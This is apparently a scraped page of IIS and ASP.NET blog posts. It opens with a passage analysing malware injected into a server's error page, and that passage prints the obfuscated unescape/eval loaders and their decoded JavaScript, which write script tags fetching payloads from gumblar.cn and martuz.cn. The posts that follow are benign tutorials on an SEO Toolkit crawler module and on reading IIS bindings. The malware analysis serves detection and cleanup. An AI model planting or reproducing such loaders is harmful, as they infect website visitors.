    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    -->
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
     
    --></script><BODY>
    <H1>Not Found</H1>
    The requested document was not found on this server.
    <P>
    <HR>
    <ADDRESS>
    Web Server at **********
    </ADDRESS>
    </BODY>
    </HTML>

    Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer who writes code like that in real Web applications.

    For those of you who, like me, do not particularly enjoy reading encoded JavaScript, what these two scripts do is simply unescape the funky-looking string and then execute it. I have un-encoded the script that would get executed and show it below, just to showcase how this malware works. Note how they special-case a couple of browsers, including Chrome, to then request a particular script that causes the real damage.

    var a = "ScriptEngine",
        b = "Version()+",
        j = "",
        u = navigator.userAgent;
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
        zrvzts = "A";
        eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
        document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>");
    }

    And:

    var a = "ScriptEngine",
        b = "Version()+",
        j = "",
        u = navigator.userAgent;
    if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
        zrvzts = "A";
        eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
        document.write("<script src=//martuz.cn/vid/?id=" + j + "><\/script>");
    }

    Notice how both of them end up writing the actual malware script, living on martuz.cn and gumblar.cn.

    Final data

    Now, this clearly means they are infected with malware, and it seems clear that the problem is not in the Web application; the infection is in the error pages being served by the server when an error happens. As a next step, to be able to guide them with more specifics, I needed to determine the Web server they were using, and that is as easy as inspecting the headers in the IIS SEO Toolkit, which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

    With the big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file, looking for ErrorDocument; that would show them which files were infected and whether it was a problem in their application or on the server.

    Case Closed

    It turns out that after they went back to their hoster with all this evidence, the hoster finally realized that the server was infected and was able to clean up the malware. The IIS SEO Toolkit helped me identify this quickly because it sees the Web site with the same eyes as a search engine, following every link and letting me perform easy queries against what it finds. In future versions of the IIS SEO Toolkit you can expect to find these kinds of things in much simpler ways, but for Beta 1, for those who care, here is the query that you can save in an XML file and load with "Open Query" to see if you are infected with this malware:

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
      <filter>
        <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
        <expression field="FileContents" operator="Contains" value="unescape" />
        <expression field="FileContents" operator="Contains" value="eval" />
      </filter>
      <displayFields>
        <field name="URL" />
        <field name="StatusCode" />
        <field name="Title" />
        <field name="Description" />
      </displayFields>
    </query>

  • CarlosAg Blog

    IIS SEO Toolkit – Crawler Module Extensibility

    • 27 Comments


    Sample SEO Toolkit CrawlerModule Extensibility

    In this blog we are going to write an example of how to extend the SEO Toolkit functionality. For that, we are going to pretend our company has a large Web site that includes several images, and we are interested in making sure all of them comply with a certain standard: let's say all of them should be smaller than 1024x768 pixels and the quality of the images should be no less than 16 bits per pixel. Additionally, we would like to be able to write custom queries that later allow us to further analyze the contents of the images and filter based on directories and more.

    For this we will extend the SEO Toolkit crawling process to perform additional processing for images. We will be adding the following new capabilities:

    1. Capture additional information from the content. In this case we will capture information about the image; in particular, we will extend the report with an "Image Width", an "Image Height" and an "Image Pixel Format".
    2. Flag additional violations. In this example we will flag three new violations:
      1. Image is too large. This violation will be flagged any time the content length of the image is larger than the "Maximum Download Size per URL" configured at the start of the analysis. It will also flag this violation if the resolution is larger than 1024x768.
      2. Image pixel format is too small. This violation will be flagged if the image is 8 or 4 bits per pixel.
      3. Image has a small resolution. This will be flagged if the image resolution per inch is less than 72dpi.

    Enter CrawlerModule

    A crawler module is a class that extends the crawling process in Site Analysis to provide custom functionality while processing each URL. By deriving from this class you can easily raise your own set of violations or add your own data and links to any URL.

    public abstract class CrawlerModule : IDisposable
    {
        // Methods
        public virtual void BeginAnalysis();
        public virtual void EndAnalysis(bool cancelled);
        public abstract void Process(CrawlerProcessContext context);

        // Properties
        protected WebCrawler Crawler { get; }
        protected CrawlerSettings Settings { get; }
    }

    It includes three main methods:

    1. BeginAnalysis. This method is invoked once at the beginning of the crawling process and allows you to perform any initialization needed. Common tasks include registering custom properties in the Report that can be accessed through the Crawler property.
    2. Process. This method is invoked for each URL once its contents have been downloaded. The context argument includes a UrlInfo property that provides all the metadata extracted for the URL. It also includes a list of the Violations and Links in the URL. Common tasks include augmenting the metadata of the URL, whether using its contents or external systems, flagging new custom Violations, or discovering new links in the contents.
    3. EndAnalysis. This method is invoked once at the end of the crawling process and allows you to do any final calculations on the report once all the URLs have been processed. Common tasks in this method include performing aggregations of data across all the URLs, or identifying violations that depend on all the data being available (such as finding duplicates).

    Coding the Image Crawler Module

    Create a Class Library in Visual Studio and add the code shown below.

    1. Open Visual Studio and select the option File->New Project
    2. In the New Project dialog select the Class Library project template and specify a name and a location such as "SampleCrawlerModule"
    3. Using the Menu "Project->Add Reference", add a reference to the IIS SEO Toolkit client library (C:\Program Files\Reference Assemblies\Microsoft\IIS\Microsoft.Web.Management.SEO.Client.dll).
    4. Since we are going to be registering this through the IIS Manager extensibility, add a reference to the IIS Manager extensibility DLL (c:\windows\system32\inetsrv\Microsoft.Web.Management.dll) using the "Project->Add Reference" menu.
    5. Also, since we will be using the .NET Bitmap class you need to add a reference to "System.Drawing" using the "Project->Add Reference" menu.
    6. Delete the auto-generated Class1.cs since we will not be using it.
    7. Using the menu "Project->Add New Item", add a new class named "ImageExtension" and replace its contents with the following code:
    using System;
    using System.Drawing;
    using System.Drawing.Imaging;
    using Microsoft.Web.Management.SEO.Crawler;

    namespace SampleCrawlerModule {

        /// <summary>
        /// Extension to add validation and metadata to images while crawling
        /// </summary>
        internal class ImageExtension : CrawlerModule {
            private const string ImageWidthField = "iWidth";
            private const string ImageHeightField = "iHeight";
            private const string ImagePixelFormatField = "iPixFmt";

            public override void BeginAnalysis() {
                // Register the properties we want to augment at the beginning of the analysis
                Crawler.Report.RegisterProperty(ImageWidthField, "Image Width", typeof(int));
                Crawler.Report.RegisterProperty(ImageHeightField, "Image Height", typeof(int));
                Crawler.Report.RegisterProperty(ImagePixelFormatField, "Image Pixel Format", typeof(string));
            }

            public override void Process(CrawlerProcessContext context) {
                // Make sure to only process the Content Types we need to
                switch (context.UrlInfo.ContentTypeNormalized) {
                    case "image/jpeg":
                    case "image/png":
                    case "image/gif":
                    case "image/bmp":
                        // Process only known content types
                        break;
                    default:
                        // Ignore any other
                        return;
                }

                //--------------------------------------------
                // If the content length of the image was larger than the max
                //   allowed to download, then flag a violation, and stop
                if (context.UrlInfo.ContentLength > Crawler.Settings.MaxContentLength) {
                    Violations.AddImageTooLargeViolation(context,
                        "It is larger than the allowed download size");
                    // Stop processing since we do not have all the content
                    return;
                }

                // Load the image from the response into a bitmap
                using (Bitmap bitmap = new Bitmap(context.UrlInfo.ResponseStream)) {
                    Size size = bitmap.Size;

                    //--------------------------------------------
                    // Augment the metadata by adding our fields
                    context.UrlInfo.SetPropertyValue(ImageWidthField, size.Width);
                    context.UrlInfo.SetPropertyValue(ImageHeightField, size.Height);
                    context.UrlInfo.SetPropertyValue(ImagePixelFormatField, bitmap.PixelFormat.ToString());

                    //--------------------------------------------
                    // Additional Violations:
                    //
                    // If the size is outside our standards, then flag violation
                    if (size.Width > 1024 &&
                        size.Height > 768) {
                        Violations.AddImageTooLargeViolation(context,
                            String.Format("The image size is: {0}x{1}",
                                          size.Width, size.Height));
                    }

                    // If the format is outside our standards, then flag violation
                    switch (bitmap.PixelFormat) {
                        case PixelFormat.Format1bppIndexed:
                        case PixelFormat.Format4bppIndexed:
                        case PixelFormat.Format8bppIndexed:
                            Violations.AddImagePixelFormatSmall(context);
                            break;
                    }

                    if (bitmap.VerticalResolution <= 72 ||
                        bitmap.HorizontalResolution <= 72) {
                        Violations.AddImageResolutionSmall(context,
                            bitmap.HorizontalResolution + "x" + bitmap.VerticalResolution);
                    }
                }
            }

            /// <summary>
            /// Helper class to hold the violations
            /// </summary>
            private static class Violations {

                private static readonly ViolationInfo ImageTooLarge =
                    new ViolationInfo("ImageTooLarge",
                                      ViolationLevel.Warning,
                                      "Image is too large.",
                                      "The Image is too large: {details}.",
                                      "Make sure that the image content is required.",
                                      "Images");

                private static readonly ViolationInfo ImagePixelFormatSmall =
                    new ViolationInfo("ImagePixelFormatSmall",
                                      ViolationLevel.Warning,
                                      "Image pixel format is too small.",
                                      "The Image pixel format is too small.",
                                      "Make sure that the quality of the image is good.",
                                      "Images");

                private static readonly ViolationInfo ImageResolutionSmall =
                    new ViolationInfo("ImageResolutionSmall",
                                      ViolationLevel.Warning,
                                      "Image resolution is small.",
                                      "The Image resolution is too small: ({res})",
                                      "Make sure that the image quality is good.",
                                      "Images");

                internal static void AddImageTooLargeViolation(CrawlerProcessContext context, string details) {
                    context.Violations.Add(new Violation(ImageTooLarge, 0, "details", details));
                }

                internal static void AddImagePixelFormatSmall(CrawlerProcessContext context) {
                    context.Violations.Add(new Violation(ImagePixelFormatSmall, 0));
                }

                internal static void AddImageResolutionSmall(CrawlerProcessContext context, string resolution) {
                    context.Violations.Add(new Violation(ImageResolutionSmall, 0, "res", resolution));
                }
            }
        }
    }

    As you can see, in BeginAnalysis the module registers the three new properties with the report using the Crawler property. This is only required if you want to provide a custom display text or use a type other than string. Note that the current version only allows primitive types such as Integer, Float, DateTime, etc.

    During the Process method it first makes sure that it only runs for known content types, then it performs its validations, raising a set of custom violations that are defined in the Violations static helper class. Note that we load the content from the ResponseStream property, which contains the raw bytes received from the server. If you were analyzing text instead, the Response property would contain the content (this is based on Content-Type, so HTML, XML, CSS, etc., are kept in this string property).

    Registering it

    When running inside IIS Manager, crawler modules first need to be registered as a standard UI module, and then, during their initialization, they need to register themselves using the IExtensibilityManager interface. In this case, to keep the code as simple as possible, everything is added in a single file. So add a new file called "RegistrationCode.cs" and include the contents below:

    using System;
    using Microsoft.Web.Management.Client;
    using Microsoft.Web.Management.SEO.Crawler;
    using Microsoft.Web.Management.Server;

    namespace SampleCrawlerModule {

        internal class SampleCrawlerModuleProvider : ModuleProvider {
            public override ModuleDefinition GetModuleDefinition(IManagementContext context) {
                return new ModuleDefinition(Name, typeof(SampleCrawlerModule).AssemblyQualifiedName);
            }

            public override Type ServiceType {
                get { return null; }
            }

            public override bool SupportsScope(ManagementScope scope) {
                return true;
            }
        }

        internal class SampleCrawlerModule : Module {
            protected override void Initialize(IServiceProvider serviceProvider, ModuleInfo moduleInfo) {
                base.Initialize(serviceProvider, moduleInfo);

                // Register the image extension so the Site Analysis crawler picks it up
                IExtensibilityManager em = (IExtensibilityManager)GetService(typeof(IExtensibilityManager));
                em.RegisterExtension(typeof(CrawlerModule), new ImageExtension());
            }
        }
    }

    This code defines a standard IIS Manager UI module, and in its client-side Initialize method it uses the IExtensibilityManager interface to register a new instance of the image extension. This makes it visible to the Site Analysis feature.

    Testing it

    To test it we need to add the UI module to Administration.config, which also means that the assembly needs to be registered in the GAC.

    To Strongly name the assembly

    In Visual Studio you can do this easily through the "Project->Properties" menu: select the "Signing" tab, check "Sign the assembly", and choose a key file. If you don't have one, you can just choose New and specify a name.
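    If you prefer the command line, a key file can also be generated with the Strong Name tool (sn.exe) that ships in the same SDK bin directory as gacutil.exe; a quick sketch (the key file name is just an example):

    "\Program Files\Microsoft SDKs\Windows\v6.0A\bin\sn.exe" -k SampleKey.snk

    You can then point the "Signing" tab at that file, or pass /keyfile:SampleKey.snk to csc.exe if you compile by hand.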

    After this you can compile, and you should be able to add the assembly to the GAC.

    To GAC it

    If you have the Windows SDK installed, you can call gacutil.exe; in my case:

    "\Program Files\Microsoft SDKs\Windows\v6.0A\bin\gacutil.exe" /if SampleCrawlerModule.dll


    (Note: you could also just open Windows Explorer, navigate to c:\Windows\assembly, and drag & drop your file in there; that will GAC it automatically.)

    Finally, to see the exact name that should be used in Administration.config, run the following command:

    "\Program Files\Microsoft SDKs\Windows\v6.0A\bin\gacutil.exe" /l SampleCrawlerModule

    In my case it displays:

    SampleCrawlerModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=6f4d9863e5b22f10, …

    Finally, register it in Administration.config

    Open Administration.config in Notepad using an elevated instance, find the </moduleProviders> closing tag, and add an entry like the one below before it, replacing the right values for Version and PublicKeyToken:

          <add name="SEOSample" type="SampleCrawlerModule.SampleCrawlerModuleProvider, SampleCrawlerModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=6f4d9863e5b22f10" />

    Use it

    After registration you should now be able to launch IIS Manager and navigate to Search Engine Optimization. Start a new analysis of your Web site. Once it completes, any violations will show up in the Violations Summary and the other reports. For example, see below all the violations in the "Images" category.

    image

    Since we also extended the metadata with the new fields (Image Width, Image Height, and Image Pixel Format), you can now use them with the Query infrastructure to easily create a report of all the images:

    image

    And since they are standard fields, they can be used in Filters, Groups, and any other functionality, including exporting data. For example, the following query can be opened in the Site Analysis feature and will display the average width and height of images, summarized by type of image:

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
      <filter>
        <expression field="ContentTypeNormalized" operator="Begins" value="image/" />
      </filter>
      <group>
        <field name="ContentTypeNormalized" />
      </group>
      <displayFields>
        <field name="ContentTypeNormalized" />
        <field name="(Count)" />
        <field name="Average(iWidth)" />
        <field name="Average(iHeight)" />
      </displayFields>
    </query>

    image

    And of course violation details are shown as specified, including Recommendation, Description, etc.:

    image

    Summary

    As you can see, extending the SEO Toolkit with a crawler module allows you to provide additional information, whether metadata, violations, or links, for any document being processed. This can be used to add support for content types not supported out-of-the-box, such as PDF, Office documents, or anything else that you need. It can also be used to extend the metadata by writing custom code to wire data from other systems into the report, giving you the ability to exploit this data using the Query capabilities of Site Analysis.
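    To make that concrete, here is a minimal skeleton of what a hypothetical PDF extension could look like, following the same shape as the image sample above. This is a sketch, not a working implementation: the Process signature is assumed to match the one used earlier, ContentTypeNormalized is assumed to be exposed on UrlInfo (it is the same name the queries use), and the actual PDF parsing is left out.

    using Microsoft.Web.Management.SEO.Crawler;

    namespace SampleCrawlerModule {

        // Hypothetical sketch: a crawler extension for PDF documents,
        // registered the same way as ImageExtension via IExtensibilityManager.
        internal class PdfExtension : CrawlerModule {

            public override void Process(CrawlerProcessContext context) {
                // Only act on PDF responses (assumes UrlInfo exposes the
                // normalized content type used by the query fields)
                if (context.UrlInfo.ContentTypeNormalized == "application/pdf") {
                    // Parse context.UrlInfo.ResponseStream with the PDF library
                    // of your choice, then call context.UrlInfo.SetPropertyValue(...)
                    // and context.Violations.Add(...) exactly as the image sample does.
                }
            }
        }
    }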

  • CarlosAg Blog

    Get IIS bindings at runtime without being an Administrator

    • 3 Comments

    Today there was a question on StackOverflow asking whether it was possible to read the IIS binding information, such as port and protocol, from the ASP.NET application itself, to handle redirects from HTTP to HTTPS in a way that works reliably even when the site uses ports other than 80/443.

    It turns out this is possible in the context of the IIS worker process by using Microsoft.Web.Administration.

    The following function takes care of that by reading the worker process's isolated configuration file and finding the HTTP-based bindings.

        private static IEnumerable<KeyValuePair<string, string>> GetBindings(HttpContext context) {
            // Get the Site name
            string siteName = System.Web.Hosting.HostingEnvironment.SiteName;

            // Get the sites section from the AppPool.config
            Microsoft.Web.Administration.ConfigurationSection sitesSection =
                Microsoft.Web.Administration.WebConfigurationManager.GetSection(null, null, "system.applicationHost/sites");

            foreach (Microsoft.Web.Administration.ConfigurationElement site in sitesSection.GetCollection()) {
                // Find the right Site
                if (String.Equals((string)site["name"], siteName, StringComparison.OrdinalIgnoreCase)) {

                    // For each binding see if they are http based and return the port and protocol
                    foreach (Microsoft.Web.Administration.ConfigurationElement binding in site.GetCollection("bindings")) {
                        string protocol = (string)binding["protocol"];
                        string bindingInfo = (string)binding["bindingInformation"];

                        if (protocol.StartsWith("http", StringComparison.OrdinalIgnoreCase)) {
                            // bindingInformation has the form "IP:port:hostheader", e.g. "*:80:"
                            string[] parts = bindingInfo.Split(':');
                            if (parts.Length == 3) {
                                string port = parts[1];
                                yield return new KeyValuePair<string, string>(protocol, port);
                            }
                        }
                    }
                }
            }
        }


    If you want to try it, you can use the following page. Just save it as test.aspx and add the function above; the result is a simple table that shows the protocol and port to be used:

    <%@ Page Language="C#" %>
    <%@ Import Namespace="System.Collections.Generic" %>
    <script runat="server">
        protected void Page_Load(object sender, EventArgs e) {
            Response.Write("<table border='1'>");
            foreach (KeyValuePair<string, string> binding in GetBindings(this.Context)) {
                Response.Write("<tr><td>");
                Response.Write(binding.Key);
                Response.Write("</td><td>");
                Response.Write(binding.Value);
                Response.Write("</td></tr>");
            }
            Response.Write("</table>");
        }
    </script>



    Also, you will need to add Microsoft.Web.Administration to the compilation assemblies inside your web.config for it to work:

    <?xml version="1.0"?>
    <configuration>
      <system.web>
        <compilation debug="true">
          <assemblies>
            <add assembly="Microsoft.Web.Administration, Version=7.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"/>
          </assemblies>
        </compilation>
      </system.web>
    </configuration>
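    And to close the loop on the original question, here is a minimal sketch of how the function could drive an HTTP-to-HTTPS redirect. The EnsureHttps helper name is illustrative, not part of any API; it assumes the GetBindings function above is available in the same page, and it only uses standard System.Web and UriBuilder calls:

        // Hypothetical helper: redirect to the site's HTTPS binding, whatever
        // port it happens to use, based on the bindings read by GetBindings.
        protected void EnsureHttps(HttpContext context) {
            if (!context.Request.IsSecureConnection) {
                foreach (KeyValuePair<string, string> binding in GetBindings(context)) {
                    if (String.Equals(binding.Key, "https", StringComparison.OrdinalIgnoreCase)) {
                        UriBuilder builder = new UriBuilder(context.Request.Url);
                        builder.Scheme = Uri.UriSchemeHttps;
                        builder.Port = int.Parse(binding.Value);
                        context.Response.Redirect(builder.Uri.AbsoluteUri);
                        break;
                    }
                }
            }
        }

    Calling it from Page_Load before rendering would send visitors to the HTTPS binding discovered at runtime instead of a hard-coded port.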